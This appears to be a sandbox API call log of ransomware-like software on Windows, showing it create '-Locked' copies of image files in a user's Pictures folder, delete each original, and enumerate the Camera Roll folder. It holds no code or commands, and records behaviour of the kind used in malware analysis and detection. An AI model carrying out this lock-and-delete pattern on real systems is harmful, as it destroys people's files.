GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg", lpFilePart=0x0) returned 0x2c [0303.701] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jbjtdopdc.jpg")) returned 1 [0303.775] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked", lpFilePart=0x0) returned 0x39 [0303.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.775] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ju9w4n8r3nhzr1k.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.776] GetFileType (hFile=0x49c) returned 0x1 [0303.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.776] GetFileType (hFile=0x49c) returned 0x1 [0303.777] CloseHandle (hObject=0x49c) returned 1 [0303.779] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png", lpFilePart=0x0) returned 0x32 [0303.779] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ju9w4n8r3nhzr1k.png")) returned 1 [0303.797] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked", lpFilePart=0x0) returned 0x3c [0303.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.797] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\onjt5so8gb0htr9slu.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.798] GetFileType (hFile=0x49c) returned 0x1 [0303.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.798] GetFileType (hFile=0x49c) returned 0x1 [0303.801] CloseHandle (hObject=0x49c) returned 1 [0303.801] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg", lpFilePart=0x0) returned 0x35 [0303.802] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\onjt5so8gb0htr9slu.jpg")) returned 1 [0303.861] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked", lpFilePart=0x0) returned 0x37 [0303.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.861] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ovrzpwsz9oix2.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.862] GetFileType (hFile=0x49c) returned 0x1 [0303.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.862] GetFileType (hFile=0x49c) returned 0x1 [0303.865] CloseHandle (hObject=0x49c) returned 1 [0303.866] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png", lpFilePart=0x0) returned 0x30 [0303.866] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ovrzpwsz9oix2.png")) returned 1 [0303.900] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked", lpFilePart=0x0) returned 0x30 [0303.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.900] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\qnrrte.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.901] GetFileType (hFile=0x49c) returned 0x1 [0303.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.903] GetFileType (hFile=0x49c) returned 0x1 [0303.906] CloseHandle (hObject=0x49c) returned 1 [0303.910] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png", lpFilePart=0x0) returned 0x29 [0303.910] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\qnrrte.png")) returned 1 [0303.992] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked", lpFilePart=0x0) returned 0x33 [0303.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0303.992] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\sogl3vvh3.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.993] GetFileType (hFile=0x49c) returned 0x1 [0303.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0303.993] GetFileType (hFile=0x49c) returned 0x1 [0303.997] CloseHandle (hObject=0x49c) returned 1 [0303.998] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg", lpFilePart=0x0) returned 0x2c [0303.998] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\soGL3VvH3.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\sogl3vvh3.jpg")) returned 1 [0304.003] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked", lpFilePart=0x0) returned 0x32 [0304.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.003] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\tqi0h8ec.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.004] GetFileType (hFile=0x49c) returned 0x1 [0304.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.004] GetFileType (hFile=0x49c) returned 0x1 [0304.006] CloseHandle (hObject=0x49c) returned 1 [0304.007] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg", lpFilePart=0x0) returned 0x2b [0304.007] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\tQi0H8EC.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\tqi0h8ec.jpg")) returned 1 [0304.013] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked", lpFilePart=0x0) returned 0x33 [0304.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.014] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\u6ipbc1t5.gif-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.014] GetFileType (hFile=0x49c) returned 0x1 [0304.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.014] GetFileType (hFile=0x49c) returned 0x1 [0304.016] CloseHandle (hObject=0x49c) returned 1 [0304.017] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif", lpFilePart=0x0) returned 0x2c [0304.017] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\u6iPBC1t5.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\u6ipbc1t5.gif")) returned 1 [0304.031] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked", lpFilePart=0x0) returned 0x38 [0304.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.032] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\uy1att05vglsri.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.032] GetFileType (hFile=0x49c) returned 0x1 [0304.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.032] GetFileType (hFile=0x49c) returned 0x1 [0304.035] CloseHandle (hObject=0x49c) returned 1 [0304.035] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png", lpFilePart=0x0) returned 0x31 [0304.036] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Uy1att05vGLsri.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\uy1att05vglsri.png")) returned 1 [0304.044] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked", lpFilePart=0x0) returned 0x30 [0304.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.044] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vvbwcj.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.045] GetFileType (hFile=0x49c) returned 0x1 [0304.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.045] GetFileType (hFile=0x49c) returned 0x1 [0304.047] CloseHandle (hObject=0x49c) returned 1 [0304.048] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg", lpFilePart=0x0) returned 0x29 [0304.048] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\VVbwcj.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\vvbwcj.jpg")) returned 1 [0304.082] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked", lpFilePart=0x0) returned 0x32 [0304.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.082] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\x0o usyk.gif-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.083] GetFileType (hFile=0x49c) returned 0x1 [0304.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.083] GetFileType (hFile=0x49c) returned 0x1 [0304.085] CloseHandle (hObject=0x49c) returned 1 [0304.086] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif", lpFilePart=0x0) returned 0x2b [0304.086] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\X0o USyk.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\x0o usyk.gif")) returned 1 [0304.097] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked", lpFilePart=0x0) returned 0x2f [0304.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.097] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\xdbeu.png-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.098] GetFileType (hFile=0x49c) returned 0x1 [0304.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.098] GetFileType (hFile=0x49c) returned 0x1 [0304.100] CloseHandle (hObject=0x49c) returned 1 [0304.110] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png", lpFilePart=0x0) returned 0x28 [0304.110] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\xDBEu.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\xdbeu.png")) returned 1 [0304.122] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked", lpFilePart=0x0) returned 0x34 [0304.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0304.123] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ysfbkffvqb.jpg-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.126] GetFileType (hFile=0x49c) returned 0x1 [0304.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0304.126] GetFileType (hFile=0x49c) returned 0x1 [0304.129] CloseHandle (hObject=0x49c) returned 1 [0304.129] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg", lpFilePart=0x0) returned 0x2d [0304.129] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\YSfbkFfVqb.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ysfbkffvqb.jpg")) returned 1 [0304.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0304.138] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x2a [0304.138] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", lpFilePart=0x0) returned 0x2b [0304.138] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.139] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.140] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.140] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0304.140] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0304.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0304.141] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0304.141] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x2a [0304.141] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\", lpFilePart=0x0) returned 0x2b [0304.141] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0304.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b0e752d, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0304.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0304.142] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b10dbc5, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b10dbc5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b10dbc5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0304.142] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0304.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0304.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0304.143] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked", lpFilePart=0x0) returned 0x3d [0304.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0304.143] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0304.144] GetFileType (hFile=0x49c) returned 0x1 [0304.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0304.144] GetFileType (hFile=0x49c) returned 0x1 [0304.146] CloseHandle (hObject=0x49c) returned 1 [0304.147] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini", lpFilePart=0x0) returned 0x36 [0304.147] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\camera roll\\desktop.ini")) returned 1 [0304.149] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", nBufferLength=0x105, lpBuffer=0x1aeca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Camera Roll", lpFilePart=0x0) returned 0x2a 